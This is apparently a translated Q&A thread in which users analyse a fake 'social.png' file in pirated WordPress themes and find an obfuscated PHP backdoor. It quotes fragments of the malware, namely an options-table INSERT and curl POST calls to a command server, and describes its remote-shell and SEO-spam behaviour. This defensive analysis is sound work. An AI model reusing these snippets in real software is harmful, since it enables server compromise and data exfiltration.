我从网站上下载了一些Wordpress主题,我注意到一个奇怪的包含social.png文件.看看这个文件,这不是一个真正的png文件,而是一个包含难以理解的混淆代码的php脚本,对于从其他站点分发的许多wordpress插件也是如此.
文件大小为45 kb并具有此哈希值 3FFC93695CA3C919F36D52D07BDB5B198E7C6D63
有人知道这个文件的功能吗?
这是文件
根据这个论坛帖子:
基本上,它是一个远程shell回调,使用公钥加密只允许黑客在您的服务器上运行代码.它生成一个每安装RSA密钥对,将其上传到命令服务器(它有一个预先列出的,但可以从其他受感染的主机动态更新,以避免被关闭)使用嵌入式密钥,并通过列表发送功能(启用eval/exec,服务器信息)并通过电子邮件将其发送到文件中找到的电子邮件列表.
它使用Wordpress的配置系统来存储其数据,因此在数据库中查看一个名为WP_CLIENT_KEY的设置键,它看起来像一堆乱码文本.
一旦处于活动状态,该漏洞利用将在服务器上获取一系列命令以进行评估 - 可能还有更多的shell或漏洞,并且还会将字符串注入页脚.这些字符串可能是blackhat SEO垃圾邮件,但它也会注入一个与之联系的命令和控制服务器列表 - 所以任何其他受感染的站点都将使用您的服务器来查找其他服务器.
正如我在评论中提到的,脚本将更新并在WP数据库中存储数据:
$AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')");
...
论坛帖子指出的是脚本自己的访问权限.该脚本还通过shell POST请求将数据(可能是公钥)发送到指定的服务器:
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true);
if (isset($WbKPQMoSbMZkXUeYKXRI)) {
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI);
}
无论脚本的确切用途如何,您都应该删除它的所有引用,并尝试完全摆脱脚本.
| 归档时间: |
|
| 查看次数: |
2922 次 |
| 最近记录: |